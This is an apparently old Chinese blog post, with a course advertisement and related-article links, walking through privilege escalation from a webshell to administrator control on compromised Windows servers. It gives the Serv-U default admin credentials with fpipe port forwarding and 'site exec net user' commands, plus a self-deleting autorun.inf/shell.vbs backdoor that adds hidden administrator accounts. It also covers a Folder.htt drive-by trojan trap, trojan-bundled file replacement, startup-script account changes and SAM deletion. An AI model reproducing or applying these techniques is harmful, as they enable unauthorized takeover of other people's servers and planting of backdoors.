分享一下我老师大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL             
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:/wwwroot/fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator  密码:#l@$ak#.lk;0@P   (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具

auto.ini 加 SHELL.VBS

autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh 
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”>
</OBJECT>
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上


replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

 [drive1:][path1]filename 指定源文件。
 [drive2:][path2] 指定要替换文件的
              目录。
 /A 把新文件加入目标目录。不能和
              /S 或 /U 命令行开关搭配使用。
 /P 替换文件或加入源文件之前会先提示您
              进行确认。
 /R 替换只读文件以及未受保护的
              文件。
 /S 替换目标目录中所有子目录的文件。
              不能与 /A 命令选项
              搭配使用。
 /W 等您插入磁盘以后再运行。
 /U 只会替换或更新比源文件日期早的文件。
              不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下

脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到“C:/winnt/system32/GroupPolicy/Machine/Scripts”
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator  XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换

分享一下我老师大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

WEBSHELL权限提升 菜菜相关推荐

  1. WEBSHELL权限提升技巧

    WEBSHELL权限提升技巧 c: d: e:..... C:/Documents and Settings/All Users/「开始」菜单/程序/       看这里能不能跳转,我们从这里可以获取 ...

  2. WEBSHELL权限提升技巧(综合版)

    c: d: e:..... C:/Documents and Settings/All Users/「开始」菜单/程序/ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C ...

  3. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  4. 权限提升之——数据库提权

    数据库权限提升 这是这两天学习的哈,一篇篇发太麻烦了,就整理在一篇文章里了,整体感觉基本都是靠工具,不靠工具的还是都比较有难度的,五一假期过去了也该继续回到紧张的学习中了,冲鸭! 在家没衣服穿太可怜了 ...

  5. 【权限提升】61 Redis Postgresql数据库提权

    目录 redis数据库权限提升 Redis未授权访问漏洞利用 1. 利用计划任务执行命令反弹shell 2. 写ssh-keygen公钥后 使用私钥登录 3. 往web路径写webshell 修复方案 ...

  6. 第60天-权限提升-MYMSORA 等 SQL 数据库提权

    思维导图 权限提升 数据库提权 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码.除 Access 数据库外,其 ...

  7. 第四章 权限提升分析及防御

    查询系统信息systeminfo 如果要查看特定的信息,可以使用systeminfo | findstr /B /C:"OS名称" /C:"OS版本" 主机名H ...

  8. 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御

    目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...

  9. hackmap-[windows权限提升(windows提权思路)]

    hackmap-[windows权限提升{windows提权思路}] 1.前言 1.1.提权分类 水平权限提升(越权) 垂直权限提升 1.2 windows提权概述 2.windows基于WebShe ...

最新文章

  1. 上传文件到服务器并显示,J2EE如何实现Servlet上传文件到服务器并相应显示功能...
  2. nga能查服务器状态吗,NGAA
  3. 1.1 torch_数据操作
  4. 最新Modis影像数据下载完整流程---以MOD13Q1 NDVI数据下载为例(2020年12月2日更新)
  5. 【操作系统复习】操作系统的特征
  6. [Bzoj3940] [AC自动机,USACO 2015 February Gold] Censor [AC自动机模板题]
  7. django orm 数据查询详解
  8. CSS3下的渐变文字效果实现
  9. linux用户管理和群界面怎么打开,Linux命令行界面下的用户和组的管理
  10. 查看电脑的CPU个数,核数,逻辑核数
  11. QTP连接数据库,并将数据保存至Excel中
  12. 亿图图示:分享你的流程图给你的小伙伴
  13. 用油猴子定制你的个性化插件
  14. Istio对接虚拟机
  15. web前端开发工程师养成记
  16. python版CSDN博客备份工具
  17. 如何快速批量建网站?
  18. NodeJS:Express 框架实战解析视频教程
  19. BugKu 你必须让他停下来
  20. 病毒分析工具和使用方法(一)

热门文章

  1. php操作带中文的json数据
  2. 使用Cucumber+Rspec玩转BDD(2)——邮件激活
  3. nload实时查看linux服务器网络流量的工具
  4. [导入]画带阴影效果的文字
  5. mysql8.0创建属性_MySQL8.0新特性——资源管理
  6. vb 获取汉字拼音的首字母
  7. 贴花纸怎么贴_电子便签贴怎么使用?怎么在电脑上贴便签
  8. Java反转单链表(code)
  9. php io select,Python IO多路复用之——select方案服务端和客户端代码【python源码详解】...
  10. js表单验证,给出友好的提示